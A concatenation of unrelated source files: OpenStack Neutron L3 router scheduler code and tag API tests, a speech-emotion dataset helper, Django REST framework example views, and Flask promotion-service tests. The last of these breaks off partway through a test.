return plugin.add_ha_port(ctxt, router_db.id, ha_net.network.id,
tenant_id)
def create_ha_port_and_bind(self, plugin, context, router_id,
tenant_id, agent, is_manual_scheduling=False):
"""Creates and binds a new HA port for this agent."""
ctxt = context.elevated()
router_db = plugin._get_router(ctxt, router_id)
creator = functools.partial(self._add_port_from_net_and_ensure_vr_id,
plugin, ctxt, router_db, tenant_id)
dep_getter = functools.partial(plugin.get_ha_network, ctxt, tenant_id)
dep_creator = functools.partial(plugin._create_ha_network,
ctxt, tenant_id)
dep_deleter = functools.partial(plugin._delete_ha_network, ctxt)
dep_id_attr = 'network_id'
# This might fail in case of concurrent calls, which is good for us
# as we can skip the rest of this function.
binding = self.bind_router(
plugin, context, router_id, agent['id'],
is_manual_scheduling=is_manual_scheduling, is_ha=True)
if not binding:
return
try:
port_binding = utils.create_object_with_dependency(
creator, dep_getter, dep_creator,
dep_id_attr, dep_deleter)[0]
with db_api.autonested_transaction(context.session):
port_binding.l3_agent_id = agent['id']
except db_exc.DBDuplicateEntry:
LOG.debug("Router %(router)s already scheduled for agent "
"%(agent)s", {'router': router_id,
'agent': agent['id']})
except l3.RouterNotFound:
LOG.debug('Router %s has already been removed '
'by concurrent operation', router_id)
def get_ha_routers_l3_agents_counts(self, plugin, context, filters=None):
"""Return a mapping (router, # agents) matching specified filters."""
return plugin.get_ha_routers_l3_agents_count(context)
def _schedule_ha_routers_to_additional_agent(self, plugin, context, agent):
"""Bind already scheduled routers to the agent.
Retrieve the number of agents per router and check if the router has
to be scheduled on the given agent if max_l3_agents_per_router
is not yet reached.
"""
routers_agents = self.get_ha_routers_l3_agents_counts(plugin, context,
agent)
admin_ctx = context.elevated()
underscheduled_routers = [router for router, agents in routers_agents
if (not self.max_ha_agents or
agents < self.max_ha_agents)]
schedulable_routers = self._get_routers_can_schedule(
plugin, admin_ctx, underscheduled_routers, agent)
for router in schedulable_routers:
if not self._router_has_binding(admin_ctx, router['id'],
agent.id):
self.create_ha_port_and_bind(plugin, admin_ctx,
router['id'],
router['tenant_id'],
agent)
def _bind_ha_router(self, plugin, context, router_id,
tenant_id, candidates):
"""Bind a HA router to agents based on a specific policy."""
if not self._enough_candidates_for_ha(candidates):
return
chosen_agents = self._choose_router_agents_for_ha(
plugin, context, candidates)
for agent in chosen_agents:
self.create_ha_port_and_bind(plugin, context, router_id,
tenant_id, agent)
return chosen_agents
class ChanceScheduler(L3Scheduler):
"""Randomly allocate an L3 agent for a router."""
def schedule(self, plugin, context, router_id,
candidates=None):
return self._schedule_router(
plugin, context, router_id, candidates=candidates)
def _choose_router_agent(self, plugin, context, candidates):
return random.choice(candidates)
def _choose_router_agents_for_ha(self, plugin, context, candidates):
num_agents = self._get_num_of_agents_for_ha(len(candidates))
return random.sample(candidates, num_agents)
class LeastRoutersScheduler(L3Scheduler):
"""Allocate to an L3 agent with the least number of routers bound."""
def schedule(self, plugin, context, router_id,
candidates=None):
return self._schedule_router(
plugin, context, router_id, candidates=candidates)
def _choose_router_agent(self, plugin, context, candidates):
candidate_ids = [candidate['id'] for candidate in candidates]
chosen_agent = plugin.get_l3_agent_with_min_routers(
context, candidate_ids)
return chosen_agent
def _choose_router_agents_for_ha(self, plugin, context, candidates):
num_agents = self._get_num_of_agents_for_ha(len(candidates))
ordered_agents = plugin.get_l3_agents_ordered_by_num_routers(
context, [candidate['id'] for candidate in candidates])
return ordered_agents[:num_agents]
class AZLeastRoutersScheduler(LeastRoutersScheduler):
"""Availability zone aware scheduler.
If a router is ha router, allocate L3 agents distributed AZs
according to router's az_hints.
"""
def _get_az_hints(self, router):
return (router.get(az_ext.AZ_HINTS) or
cfg.CONF.default_availability_zones)
def _get_routers_can_schedule(self, plugin, context, routers, l3_agent):
"""Overwrite L3Scheduler's method to filter by availability zone."""
target_routers = []
for r in routers:
az_hints = self._get_az_hints(r)
if not az_hints or l3_agent['availability_zone'] in az_hints:
target_routers.append(r)
if not target_routers:
return []
return super(AZLeastRoutersScheduler, self)._get_routers_can_schedule(
plugin, context, target_routers, l3_agent)
def _get_candidates(self, plugin, context, sync_router):
"""Overwrite L3Scheduler's method to filter by availability zone."""
all_candidates = (
super(AZLeastRoutersScheduler, self)._get_candidates(
plugin, context, sync_router))
candidates = []
az_hints = self._get_az_hints(sync_router)
for agent in all_candidates:
if not az_hints or agent['availability_zone'] in az_hints:
candidates.append(agent)
return candidates
def get_ha_routers_l3_agents_counts(self, plugin, context, filters=None):
"""Overwrite L3Scheduler's method to filter by availability zone."""
all_routers_agents = (
super(AZLeastRoutersScheduler, self).
get_ha_routers_l3_agents_counts(plugin, context, filters))
if filters is None:
return all_routers_agents
routers_agents = []
for router, agents in all_routers_agents:
az_hints = self._get_az_hints(router)
if az_hints and filters['availability_zone'] not in az_hints:
continue
routers_agents.append((router, agents))
return routers_agents
def _choose_router_agents_for_ha(self, plugin, context, candidates):
ordered_agents = plugin.get_l3_agents_ordered_by_num_routers(
context, [candidate['id'] for candidate in candidates])
num_agents = self._get_num_of_agents_for_ha(len(ordered_agents))
# Order is kept in each az
group_by_az = collections.defaultdict(list)
for agent in ordered_agents:
az = agent['availability_zone']
group_by_az[az].append(agent)
selected_agents = []
for az, agents in itertools.cycle(group_by_az.items()):
if not agents:
continue
selected_agents.append(agents.pop(0))
if len(selected_agents) >= num_agents:
break
return selected_agents
```
#### File: unit/extensions/test_tag.py
```python
from neutron.api import extensions
from neutron.common import config
import neutron.extensions
from neutron.services.tag import tag_plugin
from neutron.tests import fake_notifier
from neutron.tests.unit.db import test_db_base_plugin_v2
extensions_path = ':'.join(neutron.extensions.__path__)
class TestTagApiBase(test_db_base_plugin_v2.NeutronDbPluginV2TestCase):
def setUp(self):
service_plugins = {'TAG': "neutron.services.tag.tag_plugin.TagPlugin"}
super(TestTagApiBase, self).setUp(service_plugins=service_plugins)
plugin = tag_plugin.TagPlugin()
ext_mgr = extensions.PluginAwareExtensionManager(
extensions_path, {'TAG': plugin}
)
app = config.load_paste_app('extensions_test_app')
self.ext_api = extensions.ExtensionMiddleware(app, ext_mgr=ext_mgr)
def _get_resource_tags(self, resource_id):
res = self._show(self.resource, resource_id)
return res[self.member]['tags']
def _put_tag(self, resource_id, tag):
req = self._req('PUT', self.resource, id=resource_id,
subresource='tags', sub_id=tag)
return req.get_response(self.ext_api)
def _put_tags(self, resource_id, tags):
body = {'tags': tags}
req = self._req('PUT', self.resource, data=body, id=resource_id,
subresource='tags')
return req.get_response(self.ext_api)
def _get_tag(self, resource_id, tag):
req = self._req('GET', self.resource, id=resource_id,
subresource='tags', sub_id=tag)
return req.get_response(self.ext_api)
def _delete_tag(self, resource_id, tag):
req = self._req('DELETE', self.resource, id=resource_id,
subresource='tags', sub_id=tag)
return req.get_response(self.ext_api)
def _delete_tags(self, resource_id):
req = self._req('DELETE', self.resource, id=resource_id,
subresource='tags')
return req.get_response(self.ext_api)
def _assertEqualTags(self, expected, actual):
self.assertEqual(set(expected), set(actual))
def _make_query_string(self, tags, tags_any, not_tags, not_tags_any):
filter_strings = []
if tags:
filter_strings.append("tags=" + ','.join(tags))
if tags_any:
filter_strings.append("tags-any=" + ','.join(tags_any))
if not_tags:
filter_strings.append("not-tags=" + ','.join(not_tags))
if not_tags_any:
filter_strings.append("not-tags-any=" + ','.join(not_tags_any))
return '&'.join(filter_strings)
def _get_tags_filter_resources(self, tags=None, tags_any=None,
not_tags=None, not_tags_any=None):
params = self._make_query_string(tags, tags_any, not_tags,
not_tags_any)
req = self._req('GET', self.resource, params=params)
res = req.get_response(self.api)
res = self.deserialize(self.fmt, res)
return res[self.resource]
def _test_notification_report(self, expect_notify):
notify = set(n['event_type'] for n in fake_notifier.NOTIFICATIONS)
duplicated_notify = expect_notify & notify
self.assertEqual(expect_notify, duplicated_notify)
fake_notifier.reset()
class TestNetworkTagApi(TestTagApiBase):
resource = 'networks'
member = 'network'
def test_put_tag(self):
expect_notify = set(['tag.create.start',
'tag.create.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'red')
self.assertEqual(201, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red'], tags)
self._test_notification_report(expect_notify)
res = self._put_tag(net_id, 'blue')
self.assertEqual(201, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red', 'blue'], tags)
self._test_notification_report(expect_notify)
def test_put_tag_exists(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'blue')
self.assertEqual(201, res.status_int)
res = self._put_tag(net_id, 'blue')
self.assertEqual(201, res.status_int)
def test_put_tags(self):
expect_notify = set(['tag.update.start',
'tag.update.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red', 'green'], tags)
self._test_notification_report(expect_notify)
def test_put_tags_replace(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['red', 'green'], tags)
res = self._put_tags(net_id, ['blue', 'red'])
self.assertEqual(200, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['blue', 'red'], tags)
def test_get_tag(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'red')
self.assertEqual(201, res.status_int)
res = self._get_tag(net_id, 'red')
self.assertEqual(204, res.status_int)
def test_get_tag_notfound(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tag(net_id, 'red')
self.assertEqual(201, res.status_int)
res = self._get_tag(net_id, 'green')
self.assertEqual(404, res.status_int)
def test_delete_tag(self):
expect_notify = set(['tag.delete.start',
'tag.delete.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
res = self._delete_tag(net_id, 'red')
self.assertEqual(204, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags(['green'], tags)
self._test_notification_report(expect_notify)
def test_delete_tag_notfound(self):
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
res = self._delete_tag(net_id, 'blue')
self.assertEqual(404, res.status_int)
def test_delete_tags(self):
expect_notify = set(['tag.delete_all.start',
'tag.delete_all.end'])
with self.network() as net:
net_id = net['network']['id']
res = self._put_tags(net_id, ['red', 'green'])
self.assertEqual(200, res.status_int)
res = self._delete_tags(net_id)
self.assertEqual(204, res.status_int)
tags = self._get_resource_tags(net_id)
self._assertEqualTags([], tags)
self._test_notification_report(expect_notify)
class TestNetworkTagFilter(TestTagApiBase):
resource = 'networks'
member = 'network'
def setUp(self):
super(TestNetworkTagFilter, self).setUp()
self._prepare_network_tags()
def _prepare_network_tags(self):
res = self._make_network(self.fmt, 'net1', True)
net1_id = res['network']['id']
res = self._make_network(self.fmt, 'net2', True)
net2_id = res['network']['id']
res = self._make_network(self.fmt, 'net3', True)
net3_id = res['network']['id']
res = self._make_network(self.fmt, 'net4', True)
net4_id = res['network']['id']
res = self._make_network(self.fmt, 'net5', True)
net5_id = res['network']['id']
self._put_tags(net1_id, ['red'])
self._put_tags(net2_id, ['red', 'blue'])
self._put_tags(net3_id, ['red', 'blue', 'green'])
self._put_tags(net4_id, ['green'])
# net5: no tags
tags = self._get_resource_tags(net5_id)
self._assertEqualTags([], tags)
def _assertEqualResources(self, expected, res):
actual = [n['name'] for n in res]
self.assertEqual(set(expected), set(actual))
def test_filter_tags_single(self):
res = self._get_tags_filter_resources(tags=['red'])
self._assertEqualResources(['net1', 'net2', 'net3'], res)
def test_filter_tags_multi(self):
res = self._get_tags_filter_resources(tags=['red', 'blue'])
self._assertEqualResources(['net2', 'net3'], res)
def test_filter_tags_any_single(self):
res = self._get_tags_filter_resources(tags_any=['blue'])
self._assertEqualResources(['net2', 'net3'], res)
def test_filter_tags_any_multi(self):
res = self._get_tags_filter_resources(tags_any=['red', 'blue'])
self._assertEqualResources(['net1', 'net2', 'net3'], res)
def test_filter_not_tags_single(self):
res = self._get_tags_filter_resources(not_tags=['red'])
self._assertEqualResources(['net4', 'net5'], res)
def test_filter_not_tags_multi(self):
res = self._get_tags_filter_resources(not_tags=['red', 'blue'])
self._assertEqualResources(['net1', 'net4', 'net5'], res)
def test_filter_not_tags_any_single(self):
res = self._get_tags_filter_resources(not_tags_any=['blue'])
self._assertEqualResources(['net1', 'net4', 'net5'], res)
def test_filter_not_tags_any_multi(self):
res = self._get_tags_filter_resources(not_tags_any=['red', 'blue'])
self._assertEqualResources(['net4', 'net5'], res)
``` |
{
"source": "2020-ICT-insdeout/ICT-insideout",
"score": 3
} |
#### File: ICT-insideout/examples/common.py
```python
import numpy as np
from sklearn.model_selection import train_test_split
from utilities_test import get_data, \
get_feature_vector_from_mfcc
_DATA_PATH = '../korean_dataset'
_CLASS_LABELS = ("angry", "disappoint", "fear", "neutral", "sad", "surrender")
def extract_data(flatten):
data, labels = get_data(_DATA_PATH, class_labels=_CLASS_LABELS,
flatten=flatten)
x_train, x_test, y_train, y_test = train_test_split(
data,
labels,
test_size=0.2,
random_state=42)
return np.array(x_train), np.array(x_test), np.array(y_train), np.array(
y_test), len(_CLASS_LABELS)
def get_feature_vector(file_path, flatten):
return get_feature_vector_from_mfcc(file_path, flatten, mfcc_len=39)
``` |
{
"source": "2020lg/project-rest-api",
"score": 3
} |
#### File: project-rest-api/profiles_api/views.py
```python
from rest_framework.views import APIView
from rest_framework.response import Response # standard Response object that's returned when from APIView
from rest_framework import status
from rest_framework import viewsets
from rest_framework.authentication import TokenAuthentication # token authentication is a type of authentication we use
# for users to authenticate themselves with our API.
# It works by generating a random token string when the user logs in
# and then every request we make to that API that we need to authenticate
# we add this token string to the request ie it's effectively a password
# to check that every request that's made is authenticated correctly
from rest_framework import filters
from rest_framework.authtoken.views import ObtainAuthToken # DRF comes with an Auth Token view out the box
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated # blocks access to the entire endpoint unless the user is authenticated
from profiles_api import serializers
from profiles_api import models
from profiles_api import permissions
class HelloApiView(APIView): # creates a new class based on APIView class that Django REST framework provides
# allows us to define the application logic for our endpoint that we are going to
# assign to this view. You define a URL which is our endpoint and then you assign
# this view and DJango REST framework handles it by callin gthe appropriate function
# in the view HTTP request you make.
"""Test API View"""
serializer_class = serializers.HelloSerializer
def get(self, request, format=None):
"""Returns a list of APIView features"""
an_apiview = [
'Uses HTTP method as function (get, post, patch, put, delete)',
'Is similar to a traditional Django View',
'Gives you the most control over your application logic',
'Is mapped manually to URLs',
]
return Response({'message': 'Hello!', 'an_apiview': an_apiview}) # Response needs to contain a dict or list because it converts Response into JSON
def post(self, request):
"""Create a hello message with our name"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name') # retrieves the name field
message = f'Hello {name}'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def put(self, request, pk=None): # usually has an id (primary key) of an object you are updating
"""Handle updating an entire object"""
return Response({'method': 'PUT'})
def patch(self, request, pk=None):
"""
Handle a partial update of an object,
based on the fields provided in the request
"""
return Response({'method': 'PATCH'})
def delete(self, request, pk=None):
"""Delete an object"""
return Response({'method': 'DELETE'})
class HelloViewSet(viewsets.ViewSet):
"""Test API ViewSet"""
serializer_class = serializers.HelloSerializer
def list(self, request):
"""Return a hello message"""
a_viewset = [
'Uses actions (list, create, retrieve, update, partial_update)',
'Automatically maps to URLs using Routers',
'Provides more functionality with less code'
]
return Response({'message': 'Hello!', 'a_viewset': a_viewset})
def create(self, request):
"""Create a new hello message"""
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
name = serializer.validated_data.get('name')
message = f'Hello {name}!'
return Response({'message': message})
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST
)
def retrieve(self, request, pk=None):
"""Handle getting an object by its ID"""
return Response({'http_method': 'GET'})
def update(self, request, pk=None):
"""Handle updating an object"""
return Response({'http_method': 'PUT'})
def partial_update(self, request, pk=None):
"""Handle updating part of an object"""
return Response({'http_method': 'PATCH'})
def destroy(self, request, pk=None):
"""Handle removing an object"""
return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet): # ModelViewSet is specifically designed for managing models through our API
"""Handle creating and updating profiles"""
serializer_class = serializers.UserProfileSerializer
queryset = models.UserProfile.objects.all() # DRF knows the standard functions that you would want to perform on ModelViewSet: create, list, update, partial_update, destroy.
# DRF takes care of all that by assigning a a serializer_class to a model Serializer and queryset
authentication_classes = (TokenAuthentication,) # tuple, you can add all authentication classes here, but we'll be using AuthToken
permission_classes = (permissions.UpdateOwnProfile,)
filter_backends = (filters.SearchFilter,) # tuple
search_fields = ('name', 'email',) # searchable fields
class UserLoginApiView(ObtainAuthToken):
"""Handle creating user authentication tokens"""
renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES # ObtainAuthToken class doesn't by default enable itself in the browsable Django admin site.
# So we need to overwrite this class and customize it so it's visible in the browsable API
# and it makes us easier for us to test. We need to add renderer_classes manually.
class UserProfileFeedViewSet(viewsets.ModelViewSet):
"""Handles creating, reading and updating profile feed items"""
authentication_classes = (TokenAuthentication,)
serializer_class = serializers.ProfileFeedItemSerializer
queryset = models.ProfileFeedItem.objects.all()
permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated)
def perform_create(self, serializer): # DRF's function that allows you to customize the behavior for creating objects through a model ViewSet. When a request gets made to our ViewSet, it gets passed to our serializer class and validated, and then the serializer.save() is called by default.
"""Sets the user profile to the logged-in user"""
serializer.save(user_profile=self.request.user) # when a new object is created (HTTP POST call), DRF calls perform_create() and it passes in the serializer that we are using to create the object.
# The serializer is a model serializer so it has a save() function assigned to it. That save() function is used to save the contents of the serializer to an object in the DB.
# We are calling serializer.save() and we are passing in an additional keyword for the 'user_profile'. This gets passed in in addition to all the items in the serializer that've benn validated.
# Request object is an object that gets passed into all viewsets every time a request is made.
# Request contains all the details about the request being made to the viewset.
# If the user has authenticated, then the request has a user associated to the authenticated user. So the user field is added whenever the user is authenticated.
# If the user is not authenticated, it's just set to an anonymous user account.
``` |
{
"source": "2020-nyu-devops/promotions",
"score": 2
} |
#### File: promotions/tests/test_service.py
```python
import os
import logging
import unittest
from datetime import datetime
from unittest import TestCase
from flask_api import status # HTTP Status Codes
from service.models import Promotion, DataValidationError, db, PromoType, Product
from service import app
from service.service import init_db
from .factories import PromotionFactory, ProductFactory
from freezegun import freeze_time
DATABASE_URI = os.getenv(
"DATABASE_URI", "postgres://postgres:postgres@localhost:5432/postgres"
)
######################################################################
# T E S T C A S E S
######################################################################
@freeze_time("2020-11-03")
class TestPromotionService(TestCase):
""" REST API Server Tests """
@classmethod
def setUpClass(cls):
""" Run once before all tests """
app.config["TESTING"] = True
app.config["DEBUG"] = False
app.config["SQLALCHEMY_DATABASE_URI"] = DATABASE_URI
app.logger.setLevel(logging.CRITICAL)
init_db()
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
""" Runs before each test """
db.drop_all() # clean up the last tests
db.create_all() # create new tables
self.app = app.test_client()
def tearDown(self):
db.session.remove()
db.drop_all()
def _create_promotions(self, count):
""" Factory method to create promotions in bulk """
promotions = []
for _ in range(count):
test_promotion = PromotionFactory()
logging.debug(test_promotion.serialize())
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
self.assertEqual(
resp.status_code,
status.HTTP_201_CREATED,
"Could not create test promotion",
)
new_promotion = resp.get_json()
test_promotion.id = new_promotion["id"]
promotions.append(test_promotion)
return promotions
######################################################################
# P L A C E T E S T C A S E S H E R E
######################################################################
def test_index(self):
""" Test index call """
resp = self.app.get("/")
self.assertEqual(resp.status_code, status.HTTP_200_OK)
self.assertIn(b"NYU DevOps eCommerce Promotions", resp.data)
def test_create_promotion(self):
""" Create a new Promotion """
test_promotion = PromotionFactory()
logging.debug(test_promotion)
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# Check the data is correct
new_promotion = resp.get_json()
self.assertEqual(
new_promotion["title"], test_promotion.title, "Titles do not match"
)
self.assertEqual(
new_promotion["description"],
test_promotion.description,
"Descriptions do not match",
)
self.assertEqual(
new_promotion["promo_code"],
test_promotion.promo_code,
"Promo Codes do not match",
)
self.assertEqual(
new_promotion["promo_type"],
test_promotion.promo_type.name,
"Promo Types do not match",
)
self.assertEqual(
new_promotion["amount"], test_promotion.amount, "Amounts do not match"
)
self.assertEqual(
new_promotion["start_date"],
test_promotion.start_date.isoformat(),
"Start Date does not match",
)
self.assertEqual(
new_promotion["end_date"],
test_promotion.end_date.isoformat(),
"End Date does not match",
)
self.assertEqual(
new_promotion["is_site_wide"],
test_promotion.is_site_wide,
"Is Site Wide bool does not match",
)
def test_create_promotion_with_product(self):
""" Create a new Promotion With Product """
resp = self.app.post(
"/promotions",
json={
"id": 1,
"title": "Halloween Special",
"description": "Some items off in honor of the spookiest month.",
"promo_code": "hween",
"promo_type": "DISCOUNT",
"amount": 25,
"start_date": "2020-10-20T00:00:00",
"end_date": "2020-11-01T00:00:00",
"is_site_wide": False,
"products": [123, 456],
},
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# Check the promotion got created
new_promotion = resp.get_json()
self.assertEqual(
new_promotion["title"], "Halloween Special", "Title does not match"
)
self.assertEqual(
new_promotion["products"], [123, 456], "Products does not match"
)
def test_get_promotion(self):
""" Get a single Promotion """
# get the id of a promotion
test_promotion = self._create_promotions(1)[0]
resp = self.app.get(
"/promotions/{}".format(test_promotion.id), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
self.assertEqual(data["title"], test_promotion.title)
def test_get_promotion_not_found(self):
""" Get a Promotion thats not found """
resp = self.app.get("/promotions/0")
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_list_promotion(self):
""" List all promotions in the database """
# create two promotions
test_promotion00 = self._create_promotions(1)[0]
test_promotion01 = self._create_promotions(1)[0]
# if it gets 200 status, we pass
resp = self.app.get("/promotions")
self.assertEqual(resp.status_code, status.HTTP_200_OK)
# check that the ID of test promos match JSON returned
data = resp.get_json()
self.assertEqual(data[0]["id"], test_promotion00.id)
self.assertEqual(data[1]["id"], test_promotion01.id)
def test_update_promotion(self):
""" Update an existing Promotion """
# create a promotion to update
test_promotion = PromotionFactory()
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_201_CREATED)
# update the promotion
new_promotion = resp.get_json()
new_promotion["title"] = "unknown"
new_promotion["products"] = [123]
resp = self.app.put(
"/promotions/{}".format(new_promotion["id"]),
json=new_promotion,
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
updated_promotion = resp.get_json()
self.assertEqual(updated_promotion["title"], "unknown")
self.assertEqual(updated_promotion["products"], [123])
# check that trying to update a non-existent promotion returns 404 not found
resp = self.app.put(
"/promotions/{}".format("999999999999999"),
json=new_promotion,
content_type="application/json",
)
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
def test_delete_promotion(self):
""" Delete a Promotion """
test_promotion = self._create_promotions(1)[0]
resp = self.app.delete(
"/promotions/{}".format(test_promotion.id), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)
self.assertEqual(len(resp.data), 0)
# make sure they are deleted
resp = self.app.get(
"/promotions/{}".format(test_promotion.id), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
# If you call the DELETE function on a promotion that doesn't exist, should return OK
def test_delete_promotion_not_exist(self):
""" Delete a Promotion that does not exist """
resp = self.app.delete(
"/promotions/{}".format("9999999999999999"), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_query_promotion_list_by_site_wide(self):
""" Query all promotions in the database by site-wide """
# Create a set of promotions
promotions, is_site_wide_list = [], [True, False, True]
for site_wide in is_site_wide_list:
test_promotion = PromotionFactory()
test_promotion.is_site_wide = site_wide
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
new_promotion = resp.get_json()
promotions.append(new_promotion)
logging.debug(new_promotion)
resp = self.app.get("/promotions", query_string=f"is_site_wide={True}")
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
for promotion, site_wide in zip(promotions, is_site_wide_list):
if site_wide:
self.assertIn(promotion, data)
else:
self.assertNotIn(promotion, data)
def test_query_promotion(self):
""" Query all promotions in the database by multiple parameters """
product_1 = Product()
product_1.id = 100
product_2 = Product()
product_2.id = 200
db.session.add(product_1)
db.session.add(product_2)
# Define the test cases
test_cases = [
{
"title": "0",
"promo_code": "XYZ0000",
"promo_type": PromoType.DISCOUNT,
"amount": 50,
"is_site_wide": False,
"start_date": datetime(2020, 10, 17),
"end_date": datetime(2020, 10, 21),
},
{
"title": "1",
"promo_code": "XYZ0001",
"promo_type": PromoType.DISCOUNT,
"amount": 10,
"is_site_wide": True,
"start_date": datetime(2020, 10, 21),
"end_date": datetime(2021, 10, 23),
},
{
"title": "2",
"promo_code": "XYZ0002",
"promo_type": PromoType.BOGO,
"amount": 2,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2020, 10, 18),
},
{
"title": "3",
"promo_code": "XYZ0003",
"promo_type": PromoType.DISCOUNT,
"amount": 20,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2021, 10, 18),
},
]
tests = [
("is_site_wide=true", 1),
("is_site_wide=true&product=100", 0),
("is_site_wide=true&active=1", 1),
("is_site_wide=false&active=0", 2),
("is_site_wide=true&title=3", 0),
("is_site_wide=false", 3),
("is_site_wide=false&product=200", 1),
("promo_code=XYZ0004", 0),
("promo_code=XYZ0003", 1),
("promo_code=XYZ0003&is_site_wide=false", 1),
("amount=20&is_site_wide=false", 1),
("amount=20&is_site_wide=true", 0),
("promo_type=DISCOUNT&is_site_wide=true", 1),
("start_date=2020-10-17T00:00:00", 1),
("promo_type=BOGO", 1),
("start_date=Sat, 17 Oct 2020 00:00:00 GMT", 1),
(
"start_date=Tue, 14 Oct 2020 00:00:00 GMT&end_date=Wed, 18 Oct 2020 00:00:00 GMT",
1,
),
("duration=4", 2),
("active=0", 2),
("active=1", 2),
("product=100", 3),
("product=200", 1),
("", 4),
]
# Create the set of Promotions
for test_case in test_cases:
test_promotion = Promotion()
if not test_case["is_site_wide"]:
test_promotion.products = [product_1]
if test_case["promo_code"] == "XYZ0003":
test_promotion.products.append(product_2)
for attribute in test_case:
setattr(test_promotion, attribute, test_case[attribute])
resp = self.app.post(
"/promotions",
json=test_promotion.serialize(),
content_type="application/json",
)
# Carry out the tests
for query_str, length_of_result in tests:
logging.debug(query_str)
resp = self.app.get("/promotions", query_string=query_str)
self.assertEqual(resp.status_code, status.HTTP_200_OK)
data = resp.get_json()
print(query_str)
self.assertEqual(len(data), length_of_result)
def test_cancel_promotion(self):
""" Cancel a promotion """
# try to cancel it before it's in there
resp = self.app.post(
"/promotions/{}/cancel".format(1), content_type="application/json"
)
self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND)
# create a new promotion
test_promotion = self._create_promotions(1)[0]
# cancel the promotion
resp = self.app.post(
"/promotions/{}/cancel".format(test_promotion.id),
content_type="application/json",
)
# if it gets 200 status, we pass
self.assertEqual(resp.status_code, status.HTTP_200_OK)
def test_apply_best_promotions(self):
""" Test Apply Best Promotion """
# API: /promotions/apply?product_id=product_price
# Product - Promotion mapping
# Product 1
## Available: Promo 1, Promo 2 (Store-wide), Promo 3, Promo 6 (Store-wide, Expired)
## Best: Promo 3 (BOGO)
# Product 2
## Available: Promo 1, Promo 2 (Store-wide), Promo_4, Promo 6 (Store-wide, Expired)
## Best: Promo 4 (80%)
# Product 3
## Available: Promo 2 (Store-wide), Promo 6 (Store-wide, Expired)
## Best: Promo 2 (10%)
# Product 4
## Available: Promo 2 (Store-wide), Promo 5, Promo 6 (Store-wide, Expired)
## Best: Promo 5 (FIXED, 150)
product_1 = Product()
product_1.id = 100
product_2 = Product()
product_2.id = 200
product_3 = Product()
product_3.id = 300
product_4 = Product()
product_4.id = 400
db.session.add(product_1)
db.session.add(product_2)
db.session.add(product_3)
db.session.add(product_4)
# Define the promotions
promotions = [
{
"promo_code": "promo_code_1",
"promo_type": PromoType.DISCOUNT,
"amount": 40,
"is_site_wide": False,
"start_date": datetime(2020, 9, 2),
"end_date": datetime(2021, 10, 21),
},
{
"promo_code": "promo_code_2",
"promo_type": PromoType.DISCOUNT,
"amount": 10,
"is_site_wide": True,
"start_date": datetime(2020, 8, 21),
"end_date": datetime(2021, 10, 23),
},
{
"promo_code": "promo_code_3",
"promo_type": PromoType.BOGO,
"amount": 1,
"is_site_wide": False,
"start_date": datetime(2020, 9, 1),
"end_date": datetime(2021, 5, 30),
},
{
"promo_code": "promo_code_4",
"promo_type": PromoType.DISCOUNT,
"amount": 80,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2021, 5, 18),
},
{
"promo_code": "promo_code_5",
"promo_type": PromoType.FIXED,
"amount": 150,
"is_site_wide": False,
"start_date": datetime(2020, 10, 14),
"end_date": datetime(2021, 10, 18),
},
{
"promo_code": "promo_code_6",
"promo_type": PromoType.DISCOUNT,
"amount": 80,
"is_site_wide": True,
"start_date": datetime(2020, 9, 14),
"end_date": datetime(2020, 10, 15),
},
]
tests = [
("100=1000&200=5000", []),
(
"100=1000&200=5000&300=268&400=255",
[
{"100": "promo_code_3"},
